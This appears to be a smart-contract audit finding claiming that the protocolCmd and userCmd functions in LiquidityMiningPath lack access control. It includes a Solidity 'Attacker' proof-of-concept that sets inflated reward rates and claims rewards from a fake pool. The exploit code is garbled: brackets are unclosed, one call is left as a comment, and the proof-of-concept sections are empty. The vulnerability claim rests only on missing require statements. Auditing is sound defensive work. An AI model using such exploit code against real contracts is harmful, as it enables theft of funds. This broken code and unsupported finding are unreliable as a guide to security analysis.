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HistoryOct 06, 2023 - 12:00 a.m.

No access control on protocolCmd and userCmd; potential for abuse.

vulnerability impact
proof of concept
access control
mitigation steps
sensitive functions

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Lines of code

Vulnerability details


There is no access control on the protocolCmd and userCmd functions in LiquidityMiningPath. This means anyone can call them. There should be some checks to restrict access.

The protocolCmd and userCmd functions are defined on LiquidityMiningPath.sol:

/* @notice Consolidated method for protocol control related commands. 
     *         Used to set reward rates */
function protocolCmd(bytes calldata cmd) public virtual {
  // code 

/* @notice Consolidated method for user commands.
     *         Used for claiming liquidity mining rewards. */  
function userCmd(bytes calldata input) public payable {
  // code

Neither function has any require statements, modifiers, or other access controls on who can call them. This could allow anyone to execute sensitive protocol operations like setting reward rates or claiming rewards.

Proof of Concept

function protocolCmd:

function userCmd:

Here is some example code demonstrating how an attacker could abuse the lack of access control on protocolCmd and userCmd:

// Attacker contract 

contract Attacker {

  LiquidityMiningPath public liquidityMining;

  constructor(address _liquidityMiningAddress) {
    liquidityMining = LiquidityMiningPath(_liquidityMiningAddress); 

  function exploitProtocolCmd() public {
    // Craft exploit bytecode
    bytes memory exploitCmd = abi.encode(
      ProtocolCmd.SET_CONC_REWARDS_CODE, // Set concentrated rewards
      0x123, // Fake pool ID
      block.timestamp, // Start from current week
      block.timestamp + 365 days, // Set rewards for 1 year
      1000000 * 1e18 // Very high reward rate!

    // Call protocolCmd with fake input

  function exploitUserCmd() public {
    // Craft exploit bytecode 
    bytes memory exploitInput = abi.encode(
      0x123, // Fake pool ID
      -60, // Lower tick   
      60, // Upper tick
      [uint32(block.timestamp)] // Current week

    // Call userCmd to claim fake rewards
    liquidityMining.userCmd{value: 0}(exploitInput); 


In this attack, the attacker

  1. Craft fake bytecode for protocolCmd and userCmd
  2. Call the functions directly without any access control
  3. Set super high reward rates for themselves
  4. Claim large amounts of rewards from fake pools

The lack of access control allows anyone to call these functions and pass invalid parameters. This could corrupt the protocol state or steal funds.

Tools Used


Recommended Mitigation Steps

Consider adding a require check like:

require(msg.sender == governanceAddress, "Only governance can call"); 

Or use an onlyGovernance modifier. Lack of access control is a security risk for these sensitive functions.

Assessed type

Access Control

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